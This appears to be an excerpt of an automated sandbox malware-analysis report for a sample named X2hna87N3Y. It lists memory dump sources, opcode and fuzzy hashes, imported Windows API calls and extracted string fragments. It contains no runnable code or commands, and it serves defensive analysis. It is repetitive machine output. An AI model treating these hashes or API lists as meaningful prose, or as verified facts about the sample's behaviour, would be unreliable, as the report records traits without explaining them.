                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c7e8d07cfd8eba2abf8c2b05f9494af6c76d9082774511ee409b3e95d962f2b5
                                                                                                                  • Instruction ID: 938715693753a4edb5d78c7b3f4f487a607dde41029e56ad2683bb53f7007deb
                                                                                                                  • Opcode Fuzzy Hash: c7e8d07cfd8eba2abf8c2b05f9494af6c76d9082774511ee409b3e95d962f2b5
                                                                                                                  • Instruction Fuzzy Hash: 4541C0642046928BDB158F7AA0903B7FFA1AF63344F6885CEC4D65B343C7299847CB69
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9e8031741ce3be44f90db9408a9392ff7b7feb46da4ed2eb02f07a29a3283026
                                                                                                                  • Instruction ID: 6425a6b9a582dd3bc07fbe5876e6037d07ca5136ef6a343df5174a0f9ac2bb7e
                                                                                                                  • Opcode Fuzzy Hash: 9e8031741ce3be44f90db9408a9392ff7b7feb46da4ed2eb02f07a29a3283026
                                                                                                                  • Instruction Fuzzy Hash: 303138646042928BDB158F79A0A13B7BBA0EF53344F6C95DEC0D28B343D7288847C798
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 68b7b6e1a8ae9ff68a5e5a9a35f781b8e3bf0cd28b81fb9cf2b0760015daf89a
                                                                                                                  • Instruction ID: b0774305076c47a7440cfc0bf03c39175e06880136cff9ff491b154823b0492b
                                                                                                                  • Opcode Fuzzy Hash: 68b7b6e1a8ae9ff68a5e5a9a35f781b8e3bf0cd28b81fb9cf2b0760015daf89a
                                                                                                                  • Instruction Fuzzy Hash: F131C2B09057508FC721CF24D8A1263B7F0FF12350B195A9ED4C35B692E738990ACB55
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 73b81139b73f3013a698a71c97edfc7f49fe09bca3072786aca8b5cd9eddb53a
                                                                                                                  • Instruction ID: 54c3efd72bc484fb5cfb551817dace4e933364166ad5f207f3d27aaea7e53802
                                                                                                                  • Opcode Fuzzy Hash: 73b81139b73f3013a698a71c97edfc7f49fe09bca3072786aca8b5cd9eddb53a
                                                                                                                  • Instruction Fuzzy Hash: 9821A7B0A01B14CBC720DF64D8A1267B3F0FF12340B54592DD8C36BB61E738AA09CB98
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                  • Instruction ID: d678fdf0d93dce72c06c42feb07d799dc6e906fa53fa707c10152e8a2c2ada8b
                                                                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                  • Instruction Fuzzy Hash: 59110033A091D40EC7168D3C8400565BFE30B97635F5D939AF4F4972D2D52B8E8B8359
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 661a6e24e40bbba886a3ebe4df9a4cff2df65edc8824cef9dd24e50f5db8a443
                                                                                                                  • Instruction ID: 011f6a5abea5b87b46568ce8f37705bddba90aa052c7f329d90a8dd93bd1efce
                                                                                                                  • Opcode Fuzzy Hash: 661a6e24e40bbba886a3ebe4df9a4cff2df65edc8824cef9dd24e50f5db8a443
                                                                                                                  • Instruction Fuzzy Hash: 6D01DEF170271147D760AE51A6C072BB3AA6B90308F0A443EE90867342DF7DEC08829D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fb6114f9fed7a8ab5b1f5b0265441363e33dd5c7bb20cfbbfaf4e4cbb346c848
                                                                                                                  • Instruction ID: 84aedcd8c844a76d707aaa6490f19695bf9bea467c10beebd98febfdcbe31fa8
                                                                                                                  • Opcode Fuzzy Hash: fb6114f9fed7a8ab5b1f5b0265441363e33dd5c7bb20cfbbfaf4e4cbb346c848
                                                                                                                  • Instruction Fuzzy Hash: 1BC02B2871C50087C70CCF10EC00035B276F78B204F50712AC0032361FC0E0C402460C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ebe83ac0fc1da9879fed2ad97c6bae7c650d371e541aab90ec2c719f97d8e25b
                                                                                                                  • Instruction ID: d572b435433c33bc957bc64eed225b0cbfb09c5a0cff2b0c6b0e398834ebbbed
                                                                                                                  • Opcode Fuzzy Hash: ebe83ac0fc1da9879fed2ad97c6bae7c650d371e541aab90ec2c719f97d8e25b
                                                                                                                  • Instruction Fuzzy Hash: 5EA002E9C89809C7D5847F117A02179F1789217289F453179A54A33153A979D15C854E
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocString
                                                                                                                  • String ID: #$'$0$4$@$A$B$C$C$D$E$F$G$G$G$H$J$K$K$N$O$Q$S$U$X$[$\$\$e$f$m$u$w$y$z$z${
                                                                                                                  • API String ID: 2525500382-17171256
                                                                                                                  • Opcode ID: 565799cc9e669834e79059cc2891b53017e67edc197782a127e3051f545d0c6f
                                                                                                                  • Instruction ID: a04f4f89c1eb9f3b9d2e5566426f48c9242b968391bb4510f6409d18c5e24536
                                                                                                                  • Opcode Fuzzy Hash: 565799cc9e669834e79059cc2891b53017e67edc197782a127e3051f545d0c6f
                                                                                                                  • Instruction Fuzzy Hash: E691076150C7C18ED332CB3C884878BBED15BA7224F484BADD5ED5B2D2C7B945098767
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968395854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_400000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit
                                                                                                                  • String ID: A$C$E$G$I$K$L$M$W$Y$[$]$_
                                                                                                                  • API String ID: 2610073882-2890171266
                                                                                                                  • Opcode ID: 30e3f39d2b7907aa142a4f4320250002171428e40efd818ff74ff160ebeaf911
                                                                                                                  • Instruction ID: b6f7cae45f05b69b09684d1b5318f855af094a2e3f983b58365ef8f7b97a9cf3
                                                                                                                  • Opcode Fuzzy Hash: 30e3f39d2b7907aa142a4f4320250002171428e40efd818ff74ff160ebeaf911
                                                                                                                  • Instruction Fuzzy Hash: 6C31F66000CBD1CAD3229778944874FFFE15BA3324F084A9DE6E54B2D2D7AA8449C767
                                                                                                                  APIs
                                                                                                                  • GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,00DA5D8D,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 00DA5E48
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00DA5F03
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00DA5F92
                                                                                                                  • __freea.LIBCMT ref: 00DA5FDD
                                                                                                                  • __freea.LIBCMT ref: 00DA5FE3
                                                                                                                  • __freea.LIBCMT ref: 00DA6019
                                                                                                                  • __freea.LIBCMT ref: 00DA601F
                                                                                                                  • __freea.LIBCMT ref: 00DA602F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 127012223-0
                                                                                                                  • Opcode ID: 026024d234df1f159c7e0eba083ad7085680d33cda558413e82676fe77ea7722
                                                                                                                  • Instruction ID: 94116349f33835ac8efebb53bf97aa351e812ae422b8ae87821aac27f75c9535
                                                                                                                  • Opcode Fuzzy Hash: 026024d234df1f159c7e0eba083ad7085680d33cda558413e82676fe77ea7722
                                                                                                                  • Instruction Fuzzy Hash: 8671E472904606AFDF21AE649C41FAF7BA9DF46310F2C005AFD54A7285EB35DE4087B1
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00D8BCAC
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D8BCD8
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00D8BD17
                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D8BD34
                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00D8BD73
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D8BD90
                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00D8BDD2
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00D8BDF5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2040435927-0
                                                                                                                  • Opcode ID: 7e034050cfe6c71bcb68ebe111d8e72beb2eb1ea51aadd3c36b75217238c294a
                                                                                                                  • Instruction ID: 4244f9e138224a7785dc4f17ce47585284e1022e24fd95451c5802de54d36dbe
                                                                                                                  • Opcode Fuzzy Hash: 7e034050cfe6c71bcb68ebe111d8e72beb2eb1ea51aadd3c36b75217238c294a
                                                                                                                  • Instruction Fuzzy Hash: 2A518E72600206FFEF216F61CC45FAB7BA9EB44760F29412AFA15E6190DB34DD118BB0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _strrchr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3213747228-0
                                                                                                                  • Opcode ID: 2c47a9589d857942ba6db73439f18bf632ce85774986f6ba8f5dc3e95f03e122
                                                                                                                  • Instruction ID: fd437cda39d1fbcfdcdadfb376c9d5b68b520caf9c4d8970326f8ac2a40bac8f
                                                                                                                  • Opcode Fuzzy Hash: 2c47a9589d857942ba6db73439f18bf632ce85774986f6ba8f5dc3e95f03e122
                                                                                                                  • Instruction Fuzzy Hash: 4DB10473A002659FDF118F6CCC82BAEBBA5EF55350F198155E948AB282D274D901C7F2
                                                                                                                  APIs
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D8CBD7
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00D8CBDF
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D8CC68
                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00D8CC93
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D8CCE8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                  • String ID: csm
                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                  • Opcode ID: c70920877381f4d31fb31f1a2c45b297b32ec6d79a606fa55353b2420f8ca142
                                                                                                                  • Instruction ID: af0a66af44b1706bacb058701c8f7702600fa734a9b50d2388e8e532ab84b1cf
                                                                                                                  • Opcode Fuzzy Hash: c70920877381f4d31fb31f1a2c45b297b32ec6d79a606fa55353b2420f8ca142
                                                                                                                  • Instruction Fuzzy Hash: 6E41E334A20218EFCF10EF68C885A9EBBB1EF45314F188155E8199B362D731EE15CBB5
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,BB40E64E,?,00D98471,00D821C2,?,00000000,?), ref: 00D98423
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                  • Opcode ID: da0c58385fdda4a67463141e9f7083aeb518aed811c8580e53b9e602badc82ae
                                                                                                                  • Instruction ID: bacdf6155509dc8be18f8ee99360d623ce22004bd56c8a94474ecdc33e326e93
                                                                                                                  • Opcode Fuzzy Hash: da0c58385fdda4a67463141e9f7083aeb518aed811c8580e53b9e602badc82ae
                                                                                                                  • Instruction Fuzzy Hash: 6421C331A01315EBDF219B65EC44A5F3B59AF46BA0F290221E951E7391DB30ED01D6F0
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D8BEE2
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00D8BEF0
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00D8BF01
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                  • API String ID: 667068680-1047828073
                                                                                                                  • Opcode ID: 9a1c216be92cfcee9da137fe35af252484d8db07521685a09b155faafa28ffb2
                                                                                                                  • Instruction ID: 19d8e03ab6a69d5fd0a37f06f6cb00b76ab536f4c2ccc15aec5c1cad734ee3eb
                                                                                                                  • Opcode Fuzzy Hash: 9a1c216be92cfcee9da137fe35af252484d8db07521685a09b155faafa28ffb2
                                                                                                                  • Instruction Fuzzy Hash: 6FD09E79656354EF97005B707C098973FA5DA467513068257F411D3361E6B455048F71
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e1d81ce45b5f3bb0ab33a316def5734c136123acda92a7f322284306a11e0b9d
                                                                                                                  • Instruction ID: 9fde8fe4765b691de3f7480fb4ae948adc3b830f939116c0148592ad12856904
                                                                                                                  • Opcode Fuzzy Hash: e1d81ce45b5f3bb0ab33a316def5734c136123acda92a7f322284306a11e0b9d
                                                                                                                  • Instruction Fuzzy Hash: CCB1BF70A04349EFDF11DFA8C881BAE7FB1EF46310F184258E955A7292C7709942CBB4
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,00D96109,00D8C977,00D8B7A5), ref: 00D96120
                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D9612E
                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D96147
                                                                                                                  • SetLastError.KERNEL32(00000000,00D96109,00D8C977,00D8B7A5), ref: 00D96199
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3852720340-0
                                                                                                                  • Opcode ID: 5a999d2ea94dec3626516ca7145e7216e99a2da7509d7faf8665fe5416b0f80a
                                                                                                                  • Instruction ID: 16bc964f738a95ecc7bb5bb947a7a3ceec3d2c6342a0ab1991cfdfcf6ed449d1
                                                                                                                  • Opcode Fuzzy Hash: 5a999d2ea94dec3626516ca7145e7216e99a2da7509d7faf8665fe5416b0f80a
                                                                                                                  • Instruction Fuzzy Hash: 8E01F737259711DEAF352BB47C859672AA5EB263B5724032AF525B12F2FF118C0193B0
                                                                                                                  APIs
                                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 00D96AF9
                                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 00D96D72
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallUnexpectedtype_info::operator==
                                                                                                                  • String ID: csm$csm$csm
                                                                                                                  • API String ID: 2673424686-393685449
                                                                                                                  • Opcode ID: 38b46d1a1acc5d876f15c95fda3bc4e26f1a00a3478de9d38d645bc8d06a3da5
                                                                                                                  • Instruction ID: f956a5fab7dc8a88a64835b240b149a3b43fff6b8648a60a86929b176905b27c
                                                                                                                  • Opcode Fuzzy Hash: 38b46d1a1acc5d876f15c95fda3bc4e26f1a00a3478de9d38d645bc8d06a3da5
                                                                                                                  • Instruction Fuzzy Hash: A8B158B1900209EFCF29DFA4C9819AEBBB5FF14314F18415AF815AB212D731EA51CBB1
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1968636510.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.1968547299.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968565564.0000000000D81000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968594618.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968617668.0000000000DB2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968653502.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.1968672547.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassHandleMessageModuleRegister
                                                                                                                  • String ID: ($Melon
                                                                                                                  • API String ID: 1585107554-1480228127
                                                                                                                  • Opcode ID: 5c5a3cdfbb4f6886e64de4527dd19e818f089e5f6e6114349e5d41dd9d58ffc4
